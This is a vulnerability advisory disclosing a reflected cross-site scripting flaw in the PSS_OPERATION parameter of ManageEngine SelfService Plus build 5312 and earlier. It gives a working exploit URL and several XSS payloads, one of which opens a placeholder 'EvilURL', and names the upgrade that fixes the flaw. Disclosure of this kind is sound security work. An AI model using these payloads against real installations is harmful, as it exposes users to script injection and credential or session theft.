ManageEngine SelfService Plus build 5312 (Mar 2016) and prior suffer from a cross site scripting vulnerability.
6a9812345befd20c9b908efae9041a7d90398362c30ba33bf4adc63c0c3f284e
# Exploit Title: Reflected XSS in ManageEngine SelfService Plus - 0day - Confirmed
# Google Dork: N/A
# Date: 29/5/2016
# Exploit Author: Mohamed Saeed
# Contact: http://twitter.com/krmalab
# Website: http://www.dts-solution.com
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: <= ManageEngine SelfService Plus build 5312 (Mar 2016).
# Tested on: Affected browser’s: All - Tested on FireFox 44.0.2 .
# CVE : N/A (ManageEngine Not in CVE-ID Covered Products)
# Category: webapps
Reflected XSS:
=============
GET URL : http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock
Vulnerable Parameter : PSS_OPERATION
Exploit: http://localhost/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=unlock<button/onclick=alert(1)>DTS<>/button>
Notes:
=====
There is some filter mechanisim in place Not all XSS payload will work.
Other XSS Payloads :
==================
0x00. "><img src=x onerror=window.open('EvilURL');>
0x01. <p/onmouseover=javascript:alert(1);>DTS</p>
Refrences:
=========
0x00. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
0x01. https://www.owasp.org/index.php/XSS_Attacks
Solution:
========
Upgrade to latest version (build 5313)
About US:
=========
DTS Solution Research and Security labs provide latest security updates, research and development, tool-kits and whitepapers around cyber security.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed